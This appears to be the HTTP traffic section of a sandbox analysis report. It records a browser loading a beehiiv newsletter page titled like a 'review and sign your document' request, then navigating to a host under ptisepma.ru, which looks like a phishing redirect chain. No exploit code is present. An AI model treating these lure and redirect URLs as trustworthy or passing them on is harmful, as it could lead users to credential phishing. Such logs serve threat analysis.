Source: global trafficHTTP traffic detected: GET /assets/FreeGatedContent-D-EWr0IZ.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/TwitterEmbed-wIDCDAXa.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/CheckIcon-681VH8qr.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/useTypedLoaderData-Bk1_tu68.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/useWebBuilderCommunicator-DoXoLq6Y.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/LockClosedIcon-BluoCUMI.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/index-CCu-G_ty.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/index-D5Hq4kiz.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/index-BFDoivjB.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/index-BbnTzeLf.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/root-C5Mn_uH-.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/ArrowLeftIcon-Dz9QYxn0.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/_slug-BPtqEfI0.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/scripts/jsd/main.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/ChevronRightIcon-Dsmk2epM.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/relativeTime-tlGPeD3Q.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/HeroChatIcon-DZxH_rr3.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/FreeGatedContent-D-EWr0IZ.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /locales/en/common.json HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"baggage: sentry-environment=production,sentry-release=d18fcc64fff496fe61074277a1e9498c7d08bcd7,sentry-public_key=35c3cc890abe9dbb51e6e513fcd6bbca,sentry-trace_id=695ffbb837464cf4a120b62a556def38,sentry-sample_rate=0,sentry-sampled=falsesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sentry-trace: 695ffbb837464cf4a120b62a556def38-8000873273a0c35d-0sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/TwitterEmbed-wIDCDAXa.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/index-CCu-G_ty.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/index-D5Hq4kiz.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/index-BbnTzeLf.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /u2v2j/?utm_source=kanes-newsletter-871ead.beehiiv.com&utm_medium=referral&utm_campaign=please-review-and-sign-your-document-below HTTP/1.1Host: 2u9o.ptisepma.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://kanes-newsletter-871ead.beehiiv.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/index-BFDoivjB.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/scripts/jsd/e0c90b6a3ed1/main.js? HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /entry.worker.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveCache-Control: max-age=0Accept: */*Service-Worker: scriptSec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-belowUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /assets/_slug-BPtqEfI0.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /locales/en/common.json HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
Source: global trafficHTTP traffic detected: GET /api/4507170453979136/envelope/?sentry_key=35c3cc890abe9dbb51e6e513fcd6bbca&sentry_version=7&sentry_client=sentry.javascript.remix%2F8.9.2 HTTP/1.1Host: o922922.ingest.us.sentry.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/post_insights-l0sNRNKZ.js HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://kanes-newsletter-871ead.beehiiv.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/assets/components-Oj2xMfGE.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ; language=en; last_resource_guid=Post%3Af81a7c40-e8a8-41d3-9598-303f3006911a
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/scripts/jsd/e0c90b6a3ed1/main.js? HTTP/1.1Host: kanes-newsletter-871ead.beehiiv.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ; language=en; last_resource_guid=Post%3Af81a7c40-e8a8-41d3-9598-303f3006911a
Source: global trafficHTTP traffic detected: GET /static/embed.js HTTP/1.1Host: embed.bsky.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://kanes-newsletter-871ead.beehiiv.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
